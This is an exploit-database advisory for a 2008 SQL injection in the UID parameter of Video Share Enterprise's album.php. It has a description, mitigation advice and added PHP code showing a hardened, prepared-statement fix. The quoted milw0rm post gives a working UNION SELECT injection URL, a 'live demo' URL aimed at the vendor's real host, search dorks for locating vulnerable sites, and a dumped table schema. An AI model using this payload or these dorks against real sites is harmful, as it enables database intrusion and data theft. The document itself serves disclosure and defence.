Vendor: Video Share Enterprise
By: Hussin X
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Video Share Enterprise
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Video Share Enterprise (UID) Remote SQL Injection Vulnerability

Video Share Enterprise is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data (the UID parameter of album.php) before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow malicious users to modify queries.
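The following is an added example, not AlstraSoft's code and not part of the advisory: it shows the concatenation pattern that makes the UID parameter injectable beside a hardened form that validates the value as an integer and binds it through a PDO prepared statement. The table and column names (audio, UID, VID, vdoname, description) are taken from the column dump in the advisory; the query shape and the function names are assumptions for illustration, since the real album.php source is not on the page.

```php
<?php
// Added example (not the project's code): hardening an album lookup keyed by UID.
// Table/column names come from the advisory's dump; the query itself is assumed.

declare(strict_types=1);

/**
 * Validate the raw UID request value before it goes anywhere near SQL.
 * Returns the integer UID, or null when the value is not a plain positive
 * integer. A value such as "-58 UNION SELECT ..." is rejected here outright,
 * because FILTER_VALIDATE_INT accepts only an optionally signed decimal
 * integer and min_range additionally rejects zero and negatives.
 */
function parseUid(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $uid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $uid === false ? null : $uid;
}

/**
 * Vulnerable form, shown for contrast only: the request value is concatenated
 * into the SQL text, so whatever follows the number becomes part of the query.
 */
function vulnerableAlbumSql(string $rawUid): string
{
    return "SELECT VID, vdoname, description FROM audio WHERE UID = " . $rawUid;
}

/**
 * Hardened form: validation first, then a prepared statement with the UID bound
 * as an integer parameter, so the database never parses it as SQL.
 * Rejected values are logged, which also gives operators a detection signal.
 */
function albumRowsForUid(PDO $db, ?string $rawUid): array
{
    $uid = parseUid($rawUid);
    if ($uid === null) {
        error_log('album.php: rejected non-integer UID parameter: ' . var_export($rawUid, true));
        return [];
    }
    $stmt = $db->prepare('SELECT VID, vdoname, description FROM audio WHERE UID = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (assumed connection details; emulated prepares are disabled so MySQL
// receives a real server-side prepared statement):
// $db = new PDO('mysql:host=localhost;dbname=videoshare', $user, $pass, [
//     PDO::ATTR_EMULATE_PREPARES => false,
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
// ]);
// $rows = albumRowsForUid($db, $_GET['UID'] ?? null);
```

Validation and parameter binding are independent defenses: binding alone would already stop the injection, while the integer check additionally rejects malformed input early and produces a log line that a monitoring rule can key on.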

Exploit-DB raw data:

|___________________________________________________|
|
| Video Share Enterprise (UID) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://www.alstrasoft.com/videoshare.htm
|
| DorK   : Powered By AlstraSoft Video Share Enterprise
| DorK   : inurl:"album.php?UID="
| DorK   : inurl:"view_picture.php?viewkey="
|___________________________________________________|

Exploit:  


www.[target].com/Script/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--


L!VE DEMO:

http://www.alstrahost.com/vs/album.php?UID=-58+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

________________________
table_name : column_name


 adv:adv_status
 adv:adv_text
 adv:adv_name
 adv:adv_id
 audio:embed
 audio:be_rated
 audio:be_comment
 audio:filehome
 audio:rate
 audio:ratedby
 audio:fav_num
 audio:featured
 audio:com_num
 audio:viewnumber
 audio:vkey
 audio:country
 audio:location
 audio:record_date
 audio:adddate
 audio:addtime
 audio:type
 audio:duration
 audio:duration
 audio:flvdoname
 audio:vdoname
 audio:channel
 audio:keyword
 audio:featuredesc
 audio:UID
 audio:description
 audio:VID

________________________



____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|   
| Iraqihack | FAHD | mos_chori | Silic0n 
|
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-07-17]